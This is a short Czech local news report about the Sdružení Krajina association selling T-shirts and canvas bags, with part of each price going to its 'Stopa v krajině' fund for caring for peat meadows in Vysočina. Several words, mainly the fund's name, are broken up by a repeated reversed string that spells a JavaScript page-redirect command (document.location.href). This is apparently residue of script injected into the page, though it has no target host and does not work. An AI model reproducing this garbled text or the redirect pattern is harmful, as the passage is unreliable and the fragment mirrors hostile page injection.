Rainbow page separator

Nákupem triček či tašek lidé přispějí na ochranu přírody

Úterý, 10. prosince 2019

Počítky / Trička pánská, dámská i dětská s logem organizace a také plátěné tašky nyní nabízejí svým příznivcům lidé ze Sdružení Krajina. „Koupí trička nebo tašky přispějete do sbírky S[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topa v krajině padesáti korunami,“ informovala mluvčí Sdružení Krajina se sídlem v Počítkách Darina Coufalová s tím, že může jít také o tip na originální vánoční dárek.
Ceny triček v rozpětí od 250 do 330 korun, velikosti a barevné varianty jsou uvedeny na webových stránkách sdružení. Plátěné nákupní tašky s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojí 210 korun, jsou taktéž s potiskem a Sdružení Krajina je zájemcům nabízí ve čtyřech barevných provedeních.
Sbírka S[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topa v krajině byla založena za účelem péče o přírodu Vysočiny, konkrétně na převážně ruční údržbu cenných podmáčených rašelinných luk, o které se pracovníci Sdružení Krajina a jejich spolupracovníci starají. Sdružení funguje od roku 1997, pod svým současným názvem od roku 2001.